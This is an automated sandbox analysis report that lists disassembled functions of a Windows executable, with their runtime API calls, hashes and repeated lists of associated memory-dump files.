Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 56db30bc15a51ff1493e9caf116b841c0d8dda76d89a0d6a2b63bd6e2db61485
Instruction ID: c575e02b755c459f8a86f4878f946190cb3265e5f5e039b3bdf619bb7998e069
Opcode Fuzzy Hash: 56db30bc15a51ff1493e9caf116b841c0d8dda76d89a0d6a2b63bd6e2db61485
Instruction Fuzzy Hash: EFE04F31620114DFC720AB75D146B2A33A4FF48318F6650A7E80CC7322D7BCDC84EA4A

Function 0043C0FB Relevance: 7.6, APIs: 5, Instructions: 88fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0043C1E3
UnmapViewOfFile.KERNEL32(?), ref: 0043C1F3
CloseHandle.KERNEL32(00000000), ref: 0043C20A
CloseHandle.KERNEL32(?), ref: 0043C217
SetLastError.KERNEL32(?), ref: 0043C227

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CloseErrorHandleLast$FileUnmapView
String ID:
API String ID: 2852536630-0
Opcode ID: 8e4a172218a0f2ae0ceb2010dac5887be7d90ebfb1a919c68169e8f3e6f9d5a9
Instruction ID: 30033892d68b5b17d0c58facbb3c8ce38b557f5b8645137b218fc31aec9353e2
Opcode Fuzzy Hash: 8e4a172218a0f2ae0ceb2010dac5887be7d90ebfb1a919c68169e8f3e6f9d5a9
Instruction Fuzzy Hash: 1141B474E04218DFCB04DFA5C994A9DBBB1FF48304F10A559D402AB351DB79AD42DF88

Function 00419372 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 0041939E
_memset.LIBCMT ref: 004193BC
GetWindowTextW.USER32(00000000,?,00000100), ref: 004193D6
lstrcmpW.KERNEL32(?,?,?,?), ref: 004193E8
SetWindowTextW.USER32(00000000,?), ref: 004193F4

Part of subcall function 00408BEE: __CxxThrowException@8.LIBCMT ref: 00408C04
Part of subcall function 00408BEE: __EH_prolog3.LIBCMT ref: 00408C11

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 12947d5245180f4fedec457e8101802009914dde0931b72d313253a5040d500e
Instruction ID: 10d19425253428033bd5688e562299947657b23d82f5d14bad2b3723ab406436
Opcode Fuzzy Hash: 12947d5245180f4fedec457e8101802009914dde0931b72d313253a5040d500e
Instruction Fuzzy Hash: C201C4B6601219ABCB10AF659C88EDF77ACEB48704F004067FD16D3241FE38DD848769

Function 0044F380 Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040D018: _memset.LIBCMT ref: 0040D034

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044F3D0

Part of subcall function 0044C3E0: _memset.LIBCMT ref: 0044C404
Part of subcall function 0044C3E0: GetModuleHandleW.KERNEL32(00000000), ref: 0044C41C
Part of subcall function 0044C3E0: LoadCursorW.USER32(00000000,00007F00), ref: 0044C446
Part of subcall function 0044C3E0: RegisterClassW.USER32(00000003), ref: 0044C45A

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044F3F4
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044F406
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044F418
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044F42A

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::$_memset$ClassCursorHandleLoadModuleRegister
String ID:
API String ID: 1364246305-0
Opcode ID: af29de0a5b47e8d7f8653901ae7e2c6fc430d25ef2fcbd53d717232c96cf3450
Instruction ID: 57c452bd560cff02b3346d743db28b45bd919508f1516ef875663939bbbe34e4
Opcode Fuzzy Hash: af29de0a5b47e8d7f8653901ae7e2c6fc430d25ef2fcbd53d717232c96cf3450
Instruction Fuzzy Hash: DC114FB090424DDBDB04EF99C851BAEB7B5FF45308F14456EE521673C1CB791A00C759

Function 00451430 Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00444A60: ~ctype.LIBCPMTD ref: 00444A9C
Part of subcall function 00444A60: ~_Task_impl.LIBCPMT ref: 00444AAB

~_Task_impl.LIBCPMT ref: 00451481

Part of subcall function 0040D997: __EH_prolog3.LIBCMT ref: 0040D99E

~_Task_impl.LIBCPMT ref: 00451493
~_Task_impl.LIBCPMT ref: 004514A5

Part of subcall function 0040D9EC: __EH_prolog3.LIBCMT ref: 0040D9F3

~_Task_impl.LIBCPMT ref: 004514B7
~_Task_impl.LIBCPMT ref: 004514DB

Part of subcall function 0040DAF0: __EH_prolog3.LIBCMT ref: 0040DAF7

Part of subcall function 0040CF88: __EH_prolog3.LIBCMT ref: 0040CF8F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Task_impl$H_prolog3$~ctype
String ID:
API String ID: 932797589-0
Opcode ID: 883faae179392a043bd1cb42adf215b9005c224be747026f9ca12f2aaf03d29a
Instruction ID: 34c4dc4a70207966305f8af781f9e833fc7fccb81de96e936e9984ddfd5721d6
Opcode Fuzzy Hash: 883faae179392a043bd1cb42adf215b9005c224be747026f9ca12f2aaf03d29a
Instruction Fuzzy Hash: 0B215CB0D04189DBCB09DBD8C851BAEBBB4EF41308F1445ADE492673C2CBB91A44CB59

Function 0044ED10 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

~_Task_impl.LIBCPMT ref: 0044ED4F

Part of subcall function 0040D997: __EH_prolog3.LIBCMT ref: 0040D99E

~_Task_impl.LIBCPMT ref: 0044ED61
~_Task_impl.LIBCPMT ref: 0044ED73

Part of subcall function 0040D9EC: __EH_prolog3.LIBCMT ref: 0040D9F3

~_Task_impl.LIBCPMT ref: 0044ED85
~_Task_impl.LIBCPMT ref: 0044EDA9

Part of subcall function 0040C1AE: __EH_prolog3.LIBCMT ref: 0040C1B5

Part of subcall function 0040CF88: __EH_prolog3.LIBCMT ref: 0040CF8F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Task_impl$H_prolog3
String ID:
API String ID: 1204490572-0
Opcode ID: da9adb2ba4744615025cd9213c110e74d11e88279dade249f9723554d6c0ec08
Instruction ID: f81944ed5016fe5f5fa748fa9081c3da2efa3efd35ce52528093baef7aa2da56
Opcode Fuzzy Hash: da9adb2ba4744615025cd9213c110e74d11e88279dade249f9723554d6c0ec08
Instruction Fuzzy Hash: 2C1119B0904189DBDF05EBD9C851BAEBBB4FF45308F14466EE461673C2CB791904CB59

Function 0043064B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00430657

Part of subcall function 0042DD57: __getptd_noexit.LIBCMT ref: 0042DD5A
Part of subcall function 0042DD57: __amsg_exit.LIBCMT ref: 0042DD67

__amsg_exit.LIBCMT ref: 00430677
__lock.LIBCMT ref: 00430687
InterlockedDecrement.KERNEL32(?), ref: 004306A4
InterlockedIncrement.KERNEL32(0048DAB0), ref: 004306CF

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
